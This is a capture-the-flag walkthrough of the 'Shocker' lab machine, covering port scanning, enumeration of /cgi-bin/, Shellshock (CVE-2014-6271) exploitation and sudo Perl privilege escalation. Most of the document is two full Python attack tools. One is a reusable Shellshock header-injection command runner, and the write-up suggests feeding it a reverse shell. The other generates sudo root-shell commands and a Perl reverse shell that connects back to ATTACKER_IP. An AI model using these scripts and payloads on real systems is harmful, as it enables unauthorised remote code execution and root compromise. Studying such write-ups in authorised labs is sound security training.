Shocker
Nmap Scan
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -p- -Pn shocker.htb -T5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:40 IST
Stats: 0:03:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.92% done; ETC: 20:45 (0:01:47 remaining)
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 310.35 seconds
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sC -sV -p 80,2222 -A shocker.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:55 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4f8ade8f80477decf150d630a187e49 (RSA)
| 256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_ 256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 4.8 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 160.27 ms 10.10.14.1
2 160.38 ms shocker.htb (10.10.10.56)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.61 seconds
Checking the website in a browser reveals nothing: there is just a picture, and nothing of interest in view-source.
Let us check for existing directories (if any) on the machine.
The first gobuster scan did not give much apart from one directory, /cgi-bin/. A cgi-bin directory normally holds scripts that the web server executes to handle certain requests, so anything found in it is code that runs on the server.
Let us enumerate /cgi-bin/ further, changing the options below. Since cgi-bin is known to hold scripts, we add -x pl,sh so gobuster tries those extensions. Opening /cgi-bin/ in the browser gives access denied, so we include 403 in the status codes to return results for: the 403 only means directory listing is refused, the individual scripts inside can still be requested and executed.
The machine name, an executable script under /cgi-bin/, and Apache's mod_cgi all point to the Shellshock vulnerability (CVE-2014-6271): mod_cgi passes request headers such as User-Agent into the script's environment as variables, and a vulnerable bash executes code appended to a function definition in any of them. Let's check for Shellshock exploitation.
Nmap Shellshock Vulnerability Check.
Nmap's http-shellshock NSE script can also be used for exploitation, but for the easy way around I will use Metasploit. I have selected the Shellshock module exploit/multi/http/apache_mod_cgi_bash_env_exec and set a payload.
Now run show options, then set RHOSTS, LHOST, LPORT and TARGETURI (the full path of the script under /cgi-bin/, not just the directory), and run or exploit.
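The same check and command execution can be done without Metasploit. The script below is an added example for this writeup, not the page's own code and not the Nmap or Metasploit module. It assumes the target URL (the full path to the CGI script, which the writeup does not name here) is passed on the command line, and the header names it tries are the ones Apache's mod_cgi is known to copy into the environment.

```python
#!/usr/bin/env python3
"""Shellshock (CVE-2014-6271) check and command runner for an Apache mod_cgi script.

Added example for this writeup, not the page's own code. Assumption: the URL
of the CGI script (e.g. http://host/cgi-bin/<script>) is given on the command
line, because the writeup does not name the script here.
"""
import secrets
import sys
import urllib.error
import urllib.request
from typing import Optional

# mod_cgi exports request headers into the CGI's environment as HTTP_<NAME>
# (User-Agent -> HTTP_USER_AGENT). Any of these reaching bash is enough.
HEADERS_TO_TRY = ("User-Agent", "Referer", "Cookie")


def shellshock_header(cmd: str, marker: str) -> str:
    """Build the header value that triggers Shellshock.

    A vulnerable bash treats a variable whose value starts with "() {" as an
    exported function and keeps parsing past the closing brace, so everything
    after "};" runs when the CGI's bash starts, before the script itself.
    The two "echo" calls emit a blank line that ends the (empty) HTTP header
    section, so Apache puts the command output in the response body instead
    of failing with a 500. The marker lets us cut the output out of the body.
    """
    if "'" in cmd:
        raise ValueError("cmd must not contain single quotes")
    return f"() {{ :; }}; echo; echo; /bin/bash -c 'echo {marker}; {cmd}; echo {marker}'"


def extract_output(body: str, marker: str) -> Optional[str]:
    """Return the text between the two markers, or None if they are absent."""
    parts = body.split(marker)
    if len(parts) < 3:
        return None
    return parts[1].strip()


def run_command(url: str, cmd: str, header: str = "User-Agent",
                timeout: float = 10.0) -> Optional[str]:
    """Send cmd through the chosen header and return its output, or None."""
    marker = secrets.token_hex(8)  # fresh per request, so a cached page cannot fool us
    req = urllib.request.Request(url, headers={header: shellshock_header(cmd, marker)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as exc:
        # A 500 is common when the injected output confuses Apache's header
        # parsing; the body may still carry our markers, so inspect it anyway.
        body = exc.read().decode("utf-8", errors="replace")
    return extract_output(body, marker)


def is_vulnerable(url: str) -> bool:
    """Confirm with `id`: a page that merely reflects our header back would
    contain the markers, but the text between them would not be a uid= line."""
    out = run_command(url, "id")
    return bool(out) and "uid=" in out


def main(argv):
    if len(argv) < 2:
        print(f"usage: {argv[0]} http://host/cgi-bin/<script> [command]")
        return 2
    url, cmd = argv[1], (argv[2] if len(argv) > 2 else "id")
    for header in HEADERS_TO_TRY:
        out = run_command(url, cmd, header=header)
        if out is not None:
            print(f"[+] via {header}: {out}")
            return 0
    print("[-] no command output came back; probably not vulnerable")
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with the script URL first and no command to get `id` back; once that works, any single-quote-free command (a reverse shell one-liner included) goes in the second argument.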
Now we have a shell. Let's switch to a pty shell with python and check the user's home directory for the flag. With sudo -l we also see that we can run perl with sudo without a password.
Let's get the Perl reverse shell one-liner from Pentest Monkey, point it at our IP and a port, and execute it with sudo, while listening on that port with netcat: nc -nlvp port_number_here. Since sudo runs perl as root, the shell that connects back is root's, and the root flag can be read from there.
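The step from "sudo -l shows perl" to "root shell" is worth automating, since the same pattern shows up on many hosts. The following is an added example for this writeup, not the page's own code: it parses sudo -l output, flags entries that run as root, and prints the command that turns an allowed interpreter into a root shell. SAMPLE_SUDO_L is a constructed sample in the shape of real sudo -l output; the user and host names in it are placeholders, not the box's own. The reverse shell it generates for perl is the Pentest Monkey one-liner the writeup uses.

```python
#!/usr/bin/env python3
"""Turn `sudo -l` output into concrete root-shell commands.

Added example for this writeup, not the page's own code. SAMPLE_SUDO_L is a
constructed sample; "user" and "host" are placeholders.
"""
import os
import re
from typing import List, NamedTuple

SAMPLE_SUDO_L = """\
Matching Defaults entries for user on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on host:
    (root) NOPASSWD: /usr/bin/perl
"""


class SudoRule(NamedTuple):
    runas: str
    nopasswd: bool
    command: str


# "(root) NOPASSWD: /usr/bin/perl", "(ALL : ALL) ALL", "(root) SETENV: NOPASSWD: /bin/x, /bin/y"
_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract the rule lines that follow 'may run the following commands'."""
    rules: List[SudoRule] = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = _RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root : root)" -> "root"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append(SudoRule(runas, nopasswd, cmd.strip()))
    return rules


# How each interpreter can be made to exec a shell; sudo keeps uid 0 across the exec.
SHELL_SPAWNERS = {
    "perl": "{bin} -e 'exec \"/bin/sh\";'",
    "python": "{bin} -c 'import os; os.system(\"/bin/sh\")'",
    "python3": "{bin} -c 'import os; os.system(\"/bin/sh\")'",
    "bash": "{bin}",
    "sh": "{bin}",
}


def root_shell_commands(rules: List[SudoRule]) -> List[str]:
    """For every rule that runs as root, return a local root-shell command if we know one."""
    out = []
    for r in rules:
        if r.runas not in ("root", "ALL"):
            continue
        if r.command == "ALL":
            out.append("sudo /bin/sh")
            continue
        name = os.path.basename(r.command)
        if name in SHELL_SPAWNERS:
            out.append("sudo " + SHELL_SPAWNERS[name].format(bin=r.command))
    return out


def perl_reverse_shell(lhost: str, lport: int) -> str:
    """Pentest Monkey's perl one-liner, wrapped in sudo: connect back, dup
    stdin/stdout/stderr onto the socket, exec an interactive sh as root.
    Listen first with: nc -nlvp <lport>"""
    code = ('use Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
            'if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");'
            'open(STDERR,">&S");exec("/bin/sh -i");};') % (lhost, lport)
    return f"sudo perl -e '{code}'"


if __name__ == "__main__":
    rules = parse_sudo_l(SAMPLE_SUDO_L)
    for r in rules:
        print(f"runas={r.runas} nopasswd={r.nopasswd} command={r.command}")
    for c in root_shell_commands(rules):
        print("local root shell:", c)
    print("reverse root shell:", perl_reverse_shell("ATTACKER_IP", 4444))
```

The local `sudo perl -e 'exec "/bin/sh";'` form is enough once you already have a pty; the reverse-shell form is what the writeup does and is handy when the first shell is fragile.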
Flags